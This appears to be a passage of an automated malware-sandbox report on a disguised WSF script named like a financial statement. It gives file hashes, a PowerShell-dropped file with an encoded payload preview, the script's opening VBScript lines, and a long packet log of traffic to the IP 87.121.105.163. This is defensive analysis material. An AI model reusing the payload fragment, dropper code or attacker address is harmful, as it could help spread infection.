                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):443732
                                                Entropy (8bit):5.966074938807099
                                                Encrypted:false
                                                SSDEEP:6144:VXXZmKm+aeVLV4batODsZNrUl/nU3h4ZdL9kuy0E6QTQaDcq3bNIrdBJxJL8BTMT:VHZmFXeVLVBthsnU3WDybqJyIOu
                                                MD5:2F96FB58ECB915BD235A979620403DC7
                                                SHA1:CDBAA93B0BA0A297B77159B6D25D919DFC6EC3B5
                                                SHA-256:9F96BF67FCDDAF6DAFBF923E2DD5160E03CBFFC872E2EE2229B26DABE15AE4B0
                                                SHA-512:4C0E84ABE4A3DCAB40229509A5E6F48A2609217966E397B2F843E68BA207C00B5D07A31EDB0D80E6F30760A298EFB60DE00C81CD493255257AB801056EAFD9EC
                                                Malicious:false
                                                Preview:cQGbcQGbuwd1CQBxAZvrArUyA1wkBOsC/hPrAr1muYq70n7rAjbG6wI5D4HppaUDE+sCtPRxAZuB6eUVz2txAZvrAvzx6wK47esCc9+6tARTausCl/vrAtOycQGbcQGbMcrrAokEcQGbiRQLcQGbcQGb0eLrAjsh6wKd84PBBOsCdUHrAhuhgfm5bQkBfMvrAnjP6wLJcYtEJATrAnfV6wIGwInD6wKqiusCOquBw6ChhgBxAZtxAZu6pUEa/OsCRxXrAjbLgcKzfZL4cQGb6wJ0sIHqWL+s9OsCO19xAZtxAZtxAZtxAZvrAgGliwwQcQGb6wJnOIkME3EBm3EBm0JxAZtxAZuB+vCyBAB11+sCo/BxAZuJXCQM6wJMnesCgRGB7QADAADrAo5acQGbi1QkCOsC8wzrAo5ai3wkBHEBm+sCQoyJ6+sCedRxAZuBw5wAAADrAnApcQGbU3EBm3EBm2pAcQGb6wJkL4nr6wLMb3EBm8eDAAEAAADwFQHrAqDt6wKrU4HDAAEAAOsCn0rrAiNLU+sCRSDrAjIJievrAnZhcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGb6wLZTVNxAZtxAZtq/+sC3jtxAZuDwgXrAl476wJpkjH26wJ+fnEBmzHJcQGb6wJO9IsacQGbcQGbQXEBm+sCGhI5HAp18+sCM6LrArTZRnEBm+sChTeAfAr7uHXccQGb6wKzE4tECvxxAZtxAZsp8HEBm+sC1OP/0nEBm+sCR+m68LIEAHEBm+sCZjUxwHEBm+sC5wWLfCQM6wKWgesCJouBNAfb8/yNcQGbcQGbg8AEcQGbcQGbOdB15nEBm+sCnfqJ++sCi+hxAZv/1+sCDorrAh4b4yt1aFKuFjbiaI87WgBt5WVzfX7XOpMlWjCgRYaS1VFQrhbYXjF1aGKD8uTEBDuKDtLy6+IqfXz1VIb9WgIJWRk7mggTyy0MKkCBXHzPbEqf/vz0JzF1DK/+/M9u
                                                File type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Entropy (8bit):5.109762435101553
                                                TrID:
                                                • Generic XML (ASCII) (5005/1) 50.01%
                                                • Synchronized Multimedia Integration Language (5002/2) 49.99%
                                                File name:CDS AC 661171855-VN1 SOA.wsf
                                                File size:112'339 bytes
                                                MD5:7700a37bbfb2243c94b721449cc69b7f
                                                SHA1:bc4e02172bfd1b919672b7480a8ddc5ad439ce9a
                                                SHA256:655de8d3db5fbb1b2c4a57bb403f01070bf044c9afe2c4d6f7f25c2c765d87f7
                                                SHA512:014ec05586005b0a10648830a32ee8616c8ed83ae0469a89da4bd3f3ee5f280a8a91f59ed99338015c1e95c10b6ea9ff11616b53f809ce8e6232edf52a854506
                                                SSDEEP:3072:KI9rv8awfhzzoNWI1Qe3OjVK3EyQaeCamHaXQyKpgRpYCw+YtavFUJRoW6S:KWrvWhzzUn1Qe3OjVK3EyQvCamHaXQyM
                                                TLSH:9CB3C4A3CF0A3A185F8E2FC5AC65C9424AF751B671212478D5EDC6DDA083EACC2F8C55
                                                File Content Preview:<?xml version="1.0" ?>..<job id="@JOB_ID@">..<script ..language="VBScript">..' <![CDATA[......Kiwitrteninformations = Command ......Set Retransmissioner = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")..On error resume next......
                                                Icon Hash:68d69b8f86ab9a86
                                                Document Type:Text
                                                Number of OLE Files:1
                                                Has Summary Info:
                                                Application Name:
                                                Encrypted Document:False
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:False
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:False
                                                Flash Objects Count:0
                                                Contains VBA Macros:True
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 26, 2024 21:56:04.953886032 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.185977936 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.186059952 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.187163115 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.428232908 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428404093 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428417921 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428436041 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428441048 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428455114 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428476095 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.428498983 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428519011 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.428533077 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428544998 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428546906 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.428558111 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428580046 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.428603888 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.428641081 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.660674095 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.660782099 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.660824060 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.660907030 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.660939932 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.660973072 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.661000013 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.661056995 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.661114931 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.661664963 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.661736965 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.661814928 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.661834002 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.661885977 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.661993980 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662081003 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662085056 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.662147999 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.662157059 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662220955 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662281990 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.662343979 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662400007 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662457943 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662483931 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.662542105 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662606955 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662630081 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.662681103 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.662767887 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.893343925 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893373013 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893384933 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893399954 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893414974 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893428087 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893430948 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.893599033 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893626928 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893640995 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.893682957 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893707991 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.893793106 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893809080 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893822908 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893933058 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.893939018 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893954039 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893965960 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893992901 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.893997908 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.894054890 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894068956 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894069910 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.894084930 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894134045 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894140959 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.894181967 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894196987 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894207954 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.894241095 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.894257069 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894269943 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894298077 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894325972 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.894332886 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.895116091 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.896476030 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.896538973 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.896612883 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.896640062 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.896677971 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.896858931 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.897308111 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.897322893 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.897427082 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.897454023 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.897474051 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.897489071 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.897501945 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.897531986 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.897587061 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.897893906 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.897939920 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.897953033 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.898042917 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:05.898044109 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:05.898188114 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.125636101 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.125665903 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.125684977 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.125704050 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.125734091 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.125751019 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.125770092 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.125816107 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.125834942 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.125853062 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.125895977 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.125897884 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.125897884 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.125916958 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126014948 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126264095 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126291037 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126312017 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126347065 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126375914 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126377106 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126421928 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126449108 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126452923 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126471996 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126476049 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126490116 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126507044 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126521111 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126548052 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126565933 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126575947 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126665115 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126693010 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126734972 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126753092 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126770020 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126786947 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126806974 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126821995 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126833916 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126863956 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126884937 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126893997 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126914978 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.126938105 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.126959085 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127010107 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127032042 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127051115 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127068996 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127077103 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127088070 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127121925 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127136946 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127156019 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127212048 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127228975 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127238035 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127255917 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127273083 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127280951 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127305984 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127324104 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127335072 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127341032 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127366066 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127368927 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127377987 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127405882 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127456903 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127805948 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127827883 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127844095 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127861023 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.127923012 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.127923012 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.128751040 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.128798962 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.128824949 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.128866911 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.128885984 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.128894091 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.128962040 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.128981113 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.128989935 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.128998041 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129023075 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.129192114 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.129317999 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129370928 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129389048 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129405975 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129461050 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.129550934 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129569054 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129595041 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129612923 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129631042 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129648924 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129663944 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.129668951 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129703999 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.129730940 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.129796982 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.130331039 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.130398035 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.130417109 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.130435944 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.130453110 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.130470991 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.130486965 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.130486965 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.130491018 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.130508900 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.130565882 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.130565882 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.358711004 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.358745098 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.358762026 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.358779907 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.358798027 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.358814001 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.358822107 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.358831882 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.358850002 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.358854055 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.358870029 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.358889103 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.358931065 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359003067 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359052896 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359070063 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359112024 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359128952 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359154940 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359167099 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359189034 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359201908 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359236002 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359252930 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359255075 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359354973 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359417915 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359443903 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359538078 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359555006 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359570980 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359587908 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359592915 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359607935 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359637022 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359653950 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359659910 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359692097 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359709978 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359726906 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359730959 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359775066 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359791040 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359795094 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359812021 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359841108 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359857082 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359911919 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359915018 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359951019 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359966993 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.359971046 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.359987020 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.360003948 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.360007048 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.360023975 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.360042095 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.360043049 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.360271931 CEST4969980192.168.2.687.121.105.163
                                                Apr 26, 2024 21:56:06.360409021 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.360480070 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.360521078 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.360538960 CEST804969987.121.105.163192.168.2.6
                                                Apr 26, 2024 21:56:06.360542059 CEST4969980192.168.2.687.121.105.163
